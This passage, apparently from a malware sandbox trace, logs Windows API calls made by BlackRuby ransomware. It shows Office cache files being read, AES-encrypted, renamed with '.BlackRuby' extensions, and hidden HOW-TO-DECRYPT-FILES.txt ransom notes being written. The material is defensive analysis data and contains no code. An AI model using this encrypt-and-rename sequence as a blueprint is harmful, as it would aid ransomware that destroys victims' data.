dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.258] GetLastError () returned 0xb7 [0046.258] GetFileType (hFile=0x184) returned 0x1 [0046.258] SetErrorMode (uMode=0x0) returned 0x1 [0046.258] GetFileType (hFile=0x184) returned 0x1 [0046.260] CloseHandle (hObject=0x184) returned 1 [0046.260] GetLastError () returned 0xb7 [0046.260] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.260] GetLastError () returned 0xb7 [0046.260] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Encrypted_JjqfsKM0BFarHgS9qvQAYrWHks5G0Oj7Gz1Qnzc9C4V8c.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Encrypted_JjqfsKM0BFarHgS9qvQAYrWHks5G0Oj7Gz1Qnzc9C4V8c.BlackRuby", lpFilePart=0x0) returned 0x80 [0046.260] GetLastError () returned 0xb7 [0046.260] SetErrorMode (uMode=0x1) returned 0x0 [0046.260] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x644b6a20, ftCreationTime.dwHighDateTime=0x1cbe47d, ftLastAccessTime.dwLowDateTime=0x644b6a20, ftLastAccessTime.dwHighDateTime=0x1cbe47d, ftLastWriteTime.dwLowDateTime=0x23c75fa0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1970)) returned 1 [0046.260] GetLastError () returned 0xb7 [0046.260] SetErrorMode (uMode=0x0) returned 0x1 [0046.260] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Encrypted_JjqfsKM0BFarHgS9qvQAYrWHks5G0Oj7Gz1Qnzc9C4V8c.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\encrypted_jjqfskm0bfarhgs9qvqayrwhks5g0oj7gz1qnzc9c4v8c.blackruby")) returned 1 [0046.271] GetLastError () returned 0xb7 [0046.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.272] GetLastError () returned 0xb7 [0046.272] SetErrorMode (uMode=0x1) returned 0x0 [0046.272] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.272] GetLastError () returned 0x0 [0046.272] GetFileType (hFile=0x184) returned 0x1 [0046.272] SetErrorMode (uMode=0x0) returned 0x1 [0046.272] GetFileType (hFile=0x184) returned 0x1 [0046.273] CloseHandle (hObject=0x184) returned 1 [0046.273] GetLastError () returned 0x0 [0046.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.274] GetLastError () returned 0x0 [0046.274] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.274] GetLastError () returned 0x0 [0046.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioLR.cab", lpFilePart=0x0) returned 0x4a [0046.274] GetLastError () returned 0x0 [0046.274] SetErrorMode (uMode=0x1) returned 0x0 [0046.274] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiolr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1ca6fcc | out: lpFileInformation=0x1ca6fcc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8709caa0, ftCreationTime.dwHighDateTime=0x1cbe47a, ftLastAccessTime.dwLowDateTime=0x8709caa0, ftLastAccessTime.dwHighDateTime=0x1cbe47a, ftLastWriteTime.dwLowDateTime=0x9ce26000, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x3071e4f)) returned 1 [0046.274] GetLastError () returned 0x0 [0046.274] SetErrorMode (uMode=0x0) returned 0x1 [0046.274] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.274] GetLastError () returned 0x0 [0046.274] SetErrorMode (uMode=0x1) returned 0x0 [0046.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.274] GetLastError () returned 0x5 [0046.275] SetErrorMode (uMode=0x0) returned 0x1 [0046.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.msi", lpFilePart=0x0) returned 0x4b [0046.275] GetLastError () returned 0x5 [0046.275] SetErrorMode (uMode=0x1) returned 0x0 [0046.276] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiomui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1cc4ea8 | out: lpFileInformation=0x1cc4ea8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1726460, ftCreationTime.dwHighDateTime=0x1cbe47a, ftLastAccessTime.dwLowDateTime=0xf1726460, ftLastAccessTime.dwHighDateTime=0x1cbe47a, ftLastWriteTime.dwLowDateTime=0x9cd40820, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x1fda00)) returned 1 [0046.276] GetLastError () returned 0x5 [0046.276] SetErrorMode (uMode=0x0) returned 0x1 [0046.276] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.276] GetLastError () returned 0x5 [0046.276] SetErrorMode (uMode=0x1) returned 0x0 [0046.276] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.276] GetLastError () returned 0x5 [0046.277] SetErrorMode (uMode=0x0) returned 0x1 [0046.277] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0046.277] GetLastError () returned 0x5 [0046.277] SetErrorMode (uMode=0x1) returned 0x0 [0046.277] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce2d8c | out: lpFileInformation=0x1ce2d8c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60851350, ftCreationTime.dwHighDateTime=0x1cbe47d, ftLastAccessTime.dwLowDateTime=0x60851350, ftLastAccessTime.dwHighDateTime=0x1cbe47d, ftLastWriteTime.dwLowDateTime=0x9cd40820, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x251e)) returned 1 [0046.277] GetLastError () returned 0x5 [0046.277] SetErrorMode (uMode=0x0) returned 0x1 [0046.278] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0046.278] GetLastError () returned 0x5 [0046.278] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0046.278] GetLastError () returned 0x5 [0046.278] SetErrorMode (uMode=0x1) returned 0x0 [0046.278] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.278] GetLastError () returned 0x0 [0046.278] GetFileType (hFile=0x184) returned 0x1 [0046.278] SetErrorMode (uMode=0x0) returned 0x1 [0046.278] GetFileType (hFile=0x184) returned 0x1 [0046.278] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x251e [0046.278] GetLastError () returned 0x0 [0046.278] ReadFile (in: hFile=0x184, lpBuffer=0x1ce4b94, nNumberOfBytesToRead=0x251e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ce4b94*, lpNumberOfBytesRead=0x18ed84*=0x251e, lpOverlapped=0x0) returned 1 [0046.287] GetLastError () returned 0x0 [0046.287] CloseHandle (hObject=0x184) returned 1 [0046.288] GetLastError () returned 0x0 [0046.288] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0046.288] GetLastError () returned 0x0 [0046.288] SetErrorMode (uMode=0x1) returned 0x0 [0046.288] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60851350, ftCreationTime.dwHighDateTime=0x1cbe47d, ftLastAccessTime.dwLowDateTime=0x60851350, ftLastAccessTime.dwHighDateTime=0x1cbe47d, ftLastWriteTime.dwLowDateTime=0x9cd40820, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x251e)) returned 1 [0046.288] GetLastError () returned 0x0 [0046.288] SetErrorMode (uMode=0x0) returned 0x1 [0046.288] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0046.288] GetLastError () returned 0x0 [0046.324] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b46e9c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d60) returned 1 [0046.324] GetLastError () returned 0x0 [0046.324] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.324] GetLastError () returned 0x0 [0046.330] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.330] GetLastError () returned 0x0 [0046.330] CryptDuplicateKey (in: hKey=0x360d60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360aa0) returned 1 [0046.330] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.330] GetLastError () returned 0x0 [0046.330] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1b73ee8*=0x1, dwFlags=0x0) returned 1 [0046.330] GetLastError () returned 0x0 [0046.330] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1b73eb4, dwFlags=0x0) returned 1 [0046.330] GetLastError () returned 0x0 [0046.330] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b73f30*, pdwDataLen=0x18ed74*=0x2610, dwBufLen=0x2610 | out: pbData=0x1b73f30*, pdwDataLen=0x18ed74*=0x2610) returned 1 [0046.330] GetLastError () returned 0x0 [0046.330] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b78b7c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b78b7c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.330] GetLastError () returned 0x0 [0046.330] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b78bac*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b78bac*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.330] GetLastError () returned 0x0 [0046.330] CryptDestroyKey (hKey=0x360d60) returned 1 [0046.330] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.330] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.330] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0046.330] GetLastError () returned 0x0 [0046.330] SetErrorMode (uMode=0x1) returned 0x0 [0046.330] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.331] GetLastError () returned 0xb7 [0046.331] GetFileType (hFile=0x184) returned 0x1 [0046.331] SetErrorMode (uMode=0x0) returned 0x1 [0046.332] GetFileType (hFile=0x184) returned 0x1 [0046.333] CloseHandle (hObject=0x184) returned 1 [0046.333] GetLastError () returned 0xb7 [0046.333] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0046.333] GetLastError () returned 0xb7 [0046.333] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Encrypted_CFUs4GUnxhTTrHAvC3dWg3lvvwOoxBGTDDO3xLu2sg.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Encrypted_CFUs4GUnxhTTrHAvC3dWg3lvvwOoxBGTDDO3xLu2sg.BlackRuby", lpFilePart=0x0) returned 0x7d [0046.333] GetLastError () returned 0xb7 [0046.333] SetErrorMode (uMode=0x1) returned 0x0 [0046.333] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60851350, ftCreationTime.dwHighDateTime=0x1cbe47d, ftLastAccessTime.dwLowDateTime=0x60851350, ftLastAccessTime.dwHighDateTime=0x1cbe47d, ftLastWriteTime.dwLowDateTime=0x23d0e520, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2620)) returned 1 [0046.333] GetLastError () returned 0xb7 [0046.333] SetErrorMode (uMode=0x0) returned 0x1 [0046.334] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Encrypted_CFUs4GUnxhTTrHAvC3dWg3lvvwOoxBGTDDO3xLu2sg.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\encrypted_cfus4gunxhttrhavc3dwg3lvvwooxbgtddo3xlu2sg.blackruby")) returned 1 [0046.334] GetLastError () returned 0xb7 [0046.334] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.334] GetLastError () returned 0xb7 [0046.334] SetErrorMode (uMode=0x1) returned 0x0 [0046.334] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.334] GetLastError () returned 0x5 [0046.335] SetErrorMode (uMode=0x0) returned 0x1 [0046.335] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.336] GetLastError () returned 0x5 [0046.336] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.336] GetLastError () returned 0x5 [0046.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.336] GetLastError () returned 0x5 [0046.336] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.336] GetLastError () returned 0x5 [0046.336] SetErrorMode (uMode=0x1) returned 0x0 [0046.336] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d60 [0046.347] GetLastError () returned 0x5 [0046.348] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.348] GetLastError () returned 0x5 [0046.348] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.348] GetLastError () returned 0x5 [0046.348] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.348] GetLastError () returned 0x5 [0046.348] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.348] GetLastError () returned 0x5 [0046.348] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.348] GetLastError () returned 0x5 [0046.348] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.348] GetLastError () returned 0x12 [0046.348] FindClose (in: hFindFile=0x360d60 | out: hFindFile=0x360d60) returned 1 [0046.349] SetErrorMode (uMode=0x0) returned 0x1 [0046.349] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.349] GetLastError () returned 0x12 [0046.349] SetErrorMode (uMode=0x1) returned 0x0 [0046.349] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360d60 [0046.350] GetLastError () returned 0x12 [0046.350] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.350] GetLastError () returned 0x12 [0046.351] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.351] GetLastError () returned 0x12 [0046.351] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.351] GetLastError () returned 0x12 [0046.351] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.351] GetLastError () returned 0x12 [0046.351] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.351] GetLastError () returned 0x12 [0046.351] FindNextFileW (in: hFindFile=0x360d60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.351] GetLastError () returned 0x12 [0046.351] FindClose (in: hFindFile=0x360d60 | out: hFindFile=0x360d60) returned 1 [0046.352] SetErrorMode (uMode=0x0) returned 0x1 [0046.352] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.msi", lpFilePart=0x0) returned 0x4d [0046.352] GetLastError () returned 0x12 [0046.352] SetErrorMode (uMode=0x1) returned 0x0 [0046.352] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\onenotemui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1b9ed9c | out: lpFileInformation=0x1b9ed9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20354600, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x20354600, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x384c5590, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1b7a00)) returned 1 [0046.353] GetLastError () returned 0x12 [0046.353] SetErrorMode (uMode=0x0) returned 0x1 [0046.354] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.354] GetLastError () returned 0x12 [0046.354] SetErrorMode (uMode=0x1) returned 0x0 [0046.354] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.355] GetLastError () returned 0x0 [0046.355] GetFileType (hFile=0x184) returned 0x1 [0046.355] SetErrorMode (uMode=0x0) returned 0x1 [0046.355] GetFileType (hFile=0x184) returned 0x1 [0046.355] WriteFile (in: hFile=0x184, lpBuffer=0x1bba8f4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1bba8f4*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 